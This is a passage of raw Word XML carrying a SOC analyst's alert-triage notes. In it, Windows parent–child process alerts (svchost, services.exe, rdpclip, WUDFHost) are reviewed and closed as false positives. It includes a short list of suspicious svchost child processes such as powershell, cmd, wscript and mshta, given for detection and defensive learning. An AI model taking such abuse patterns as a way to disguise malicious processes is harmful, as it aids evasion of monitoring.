        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F454C">
        <w:t>keyroaming</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F454C">
        <w:t xml:space="preserve"> parameter is used to synchronize keys and certificates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776A54EC" w14:textId="77777777" w:rsidR="00EC6874" w:rsidRPr="00EC6874" w:rsidRDefault="00EC6874" w:rsidP="00EC6874">
      <w:r w:rsidRPr="00EC6874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason for Classifying as False Positive:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC6874">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4548E78E" w14:textId="77777777" w:rsidR="00EC6874" w:rsidRPr="00EC6874" w:rsidRDefault="00EC6874" w:rsidP="00EC6874">
      <w:r w:rsidRPr="00EC6874">
        <w:t>Process relationship is common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E81C50" w14:textId="77777777" w:rsidR="00EC6874" w:rsidRPr="00EC6874" w:rsidRDefault="00EC6874" w:rsidP="00EC6874">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC6874">
        <w:t>svchost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC6874">
        <w:t>(service host) is used to manage system services) is running taskhostw.exe(task scheduler) which is common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4198FB83" w14:textId="410C3FD9" w:rsidR="00EC6874" w:rsidRDefault="00EC6874">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">So after doing this, the question may arise, IS ANY CHILD FROM PARENT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svchost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(service host) a common relationship, and can be ignore easily? The answer is no.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9E87B5" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>No, you cannot assume that any child process created by svchost.exe is always safe. Many child processes under svchost.exe are legitimate, but not all of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C8E1D3" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>What svchost.exe normally does</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8C48E6" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>svchost.exe (Service Host) runs a large number of legitimate Windows services such as Windows Update, DNS Client, DHCP, Windows Defender, and other background system functions. In normal operation, it can legitimately create child processes like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D57319" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>rundll32.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAD743B" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>dllhost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F50AF5C" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>taskhostw.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4564318A" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>conhost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCD6229" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>audiodg.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753B8F5D" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>These are usually normal relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7E623" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>Why you cannot assume it is always safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944903A" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>Attackers frequently abuse svchost.exe. Malware may inject code into svchost.exe or use it to spawn malicious child processes in an attempt to appear legitimate. This means svchost.exe can also be involved in malicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465DCDCC" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>Examples of suspicious child processes include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ACE4F4" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED80FF3" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E8B6AB" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>wscript.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B48C58" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>mshta.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6478FE15" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>Any executable running from uncommon paths such as user folders, temp folders, or downloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B85E0C" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>Any unsigned or unknown executable launched by svchost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFCB3DA" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>These relationships are generally not normal and should be investigated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788C5C3A" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8A933" w14:textId="3BBB1974" w:rsidR="00EC6874" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>Most svchost.exe child processes are normal because it hosts many Windows services. However, you should not assume they are always safe. The safety depends entirely on which child process is being launched and from where.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8E1E6A" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD"/>
    <w:p w14:paraId="36937707" w14:textId="5486B4A1" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now in the following case:-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00107FAD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ECC76AE" wp14:editId="379B6792">
            <wp:extent cx="5731510" cy="1743075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1059439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439661" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1743075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A408860" w14:textId="16B45517" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t xml:space="preserve">So the service host has spawned a child process using rdpclip.exe. But rdpclip.exe is a legitimate process. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DCDFAC" w14:textId="4E2AE327" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00107FAD">
        <w:t>rdpclip.exe is a legitimate Windows process that manages the clipboard for Remote Desktop sessions, allowing users to copy and paste text, files, and other data between their local computer and a remote computer. It synchronizes the clipboard contents, enabling seamless data transfer between the two machines. If this process stops working, copy-paste functionality will fail, and it can be restarted by ending the task in Task Manager and creating a new one</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA10DBF" w14:textId="2928E8D3" w:rsidR="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r>
        <w:t>Hence, naturally, this is a false positive. Case report :-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10451ED4" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRPr="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00107FAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time of Activity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00107FAD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BC6E3A" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRPr="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00107FAD">
        <w:t> 11/23/2025 05:47:38.349</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DD7E49" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRPr="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00107FAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of Related Entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="00107FAD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D42A0D7" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRPr="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00107FAD">
        <w:t>host.name: win-3450</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60214EA4" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRPr="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00107FAD">
        <w:t>process.name: rdpclip.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D2D10D" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRPr="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107FAD">
        <w:t>process.pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00107FAD">
        <w:t>: 3587</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAADA01" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRPr="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107FAD">
        <w:t>process.parent.pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00107FAD">
        <w:t>: 3855</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177A42FD" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRPr="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00107FAD">
        <w:t>process.parent.name: svchost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4868A998" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRPr="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107FAD">
        <w:t>process.command_line</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00107FAD">
        <w:t>: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107FAD">
        <w:t>rdpclip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="723F0335" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRPr="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107FAD">
        <w:t>process.working_directory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00107FAD">
        <w:t>: C:\Windows\system32\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B0408" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRPr="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00107FAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason for Classifying as False Positive:</w:t>
      </w:r>
      <w:r w:rsidRPr="00107FAD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0286A9CF" w14:textId="77777777" w:rsidR="00107FAD" w:rsidRPr="00107FAD" w:rsidRDefault="00107FAD" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00107FAD">
        <w:t>Process relationship is common.rdpclip.exe is a legitimate Windows process that manages the clipboard for Remote Desktop sessions, allowing users to copy and paste text, files, and other data between their local computer and a remote computer. So it can be spawned by the service host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCB927C" w14:textId="367FE0BA" w:rsidR="00107FAD" w:rsidRDefault="00CE7FEB" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00CE7FEB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62DCFD89" wp14:editId="7C7A5E03">
            <wp:extent cx="5731510" cy="4036060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="1322575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75194" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4036060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A362B4" w14:textId="4DCDF69C" w:rsidR="00CE7FEB" w:rsidRDefault="00CE7FEB" w:rsidP="00107FAD">
      <w:r>
        <w:t>Above shows how services.exe and svchost.exe are different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F1A2FD" w14:textId="77777777" w:rsidR="00CE7FEB" w:rsidRDefault="00CE7FEB" w:rsidP="00107FAD"/>
    <w:p w14:paraId="7FCB5AE0" w14:textId="29A4C378" w:rsidR="00CE7FEB" w:rsidRDefault="00CE7FEB" w:rsidP="00107FAD">
      <w:r>
        <w:t>NEXT –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65841999" w14:textId="0FAA59BC" w:rsidR="00CE7FEB" w:rsidRDefault="00CE7FEB" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00CE7FEB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15414243" wp14:editId="79F64377">
            <wp:extent cx="5731510" cy="2499360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1158934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934826" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2499360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E68AF3" w14:textId="5B06A2A5" w:rsidR="00CE7FEB" w:rsidRDefault="00CE7FEB" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00CE7FEB">
        <w:br/>
        <w:t>wudfhost.exe is a legitimate and essential Windows process called the </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00CE7FEB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Windows User-Mode Driver Framework Host Service</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CE7FEB">
        <w:t>. It is responsible for running and managing hardware drivers in "user mode," which increases system stability by isolating them from the core operating system. This process is safe and necessary for your computer's hardware, such as keyboards, USB devices, and webcams, to function correctly. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179DF1A0" w14:textId="06415837" w:rsidR="00CE7FEB" w:rsidRDefault="00CE7FEB" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00CE7FEB">
        <w:lastRenderedPageBreak/>
        <w:t> Wudfhost.exe (User-mode Driver Framework Host Process) is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE7FEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>child process of the driver manager service</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE7FEB">
        <w:t>, which runs within services.exe. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1635C7" w14:textId="7E803F8F" w:rsidR="00CE7FEB" w:rsidRDefault="00CE7FEB" w:rsidP="00107FAD">
      <w:r>
        <w:t xml:space="preserve">So relationship is common. Case report – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3362B705" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:r w:rsidRPr="003C6E6A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time of Activity:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D13FD20" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:r w:rsidRPr="003C6E6A">
        <w:t>11/23/2025 05:54:24.349</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E2AB50" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:r w:rsidRPr="003C6E6A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of Related Entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD2EB1D" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>event.code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02928338" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:r w:rsidRPr="003C6E6A">
        <w:t>host.name: win-3455</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C099FD" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:r w:rsidRPr="003C6E6A">
        <w:t>process.name: WUDFHost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE063EA" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>process.pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>: 3710</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4765F328" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>process.parent.pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>: 3817</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2E15C8" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:r w:rsidRPr="003C6E6A">
        <w:t>process.parent.name: services.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0661BC" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>process.command_line</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>: "C:\Windows\System32\WUDFHost.exe" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>HostGUID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>:{24b7eef1-ada5-453b-a5a6-93007dca6fbc} -IoEventPortName:\UMDFCommunicationPorts\WUDF\HostProcess-fd5c32fb-5bb6-4693-82a7-6cec85d58bc4 -SystemEventPortName:\UMDFCommunicationPorts\WUDF\HostProcess-3ba97dd6-3700-4e8a-8921-1e24128d9c7d -IoCancelEventPortName:\UMDFCommunicationPorts\WUDF\HostProcess-2a6ae716-7c20-4d0c-97b6-bb3346775edf -NonStateChangingEventPortName:\UMDFCommunicationPorts\WUDF\HostProcess-54470b14-46b9-4c56-abe1-d9b12ef13c5f -LifetimeId:39d16a20-5092-495b-95b9-c7e0ec216f0f -DeviceGroupId: -HostArg:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE05F75" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>process.working_directory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>: C:\Windows\system32\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BAF680" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:r w:rsidRPr="003C6E6A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason for Classifying as False Positive:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448F7506" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:r w:rsidRPr="003C6E6A">
        <w:t>Wudfhost.exe (User-mode Driver Framework Host Process) can be a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>child process of the driver manager service</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>, which runs within services.exe. So process relationship is common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA94036" w14:textId="389E5E27" w:rsidR="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="00107FAD">
      <w:r>
        <w:t xml:space="preserve">NEXT – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5D23AA" w14:textId="0D70E4F1" w:rsidR="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="00107FAD">
      <w:r w:rsidRPr="003C6E6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F0BB942" wp14:editId="15F17FB0">
            <wp:extent cx="5731510" cy="2009140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10884009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8400922" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2009140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0161F" w14:textId="1C3172FE" w:rsidR="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="00107FAD">
      <w:r>
        <w:t>Again a common relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407DE55B" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C6E6A">
        <w:lastRenderedPageBreak/>
        <w:t>Process details</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t>Child process: svchost.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t>Parent process: services.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t xml:space="preserve">Command line: C:\Windows\system32\svchost.exe -k </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>wsappx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t>Working directory: C:\Windows\system32\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D4A6EE" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>What this means</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t>services.exe is the Windows Service Control Manager.</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t>svchost.exe is the generic host process that runs Windows services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5114CE41" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:r w:rsidRPr="003C6E6A">
        <w:t>The command line:</w:t>
      </w:r>
    </w:p>
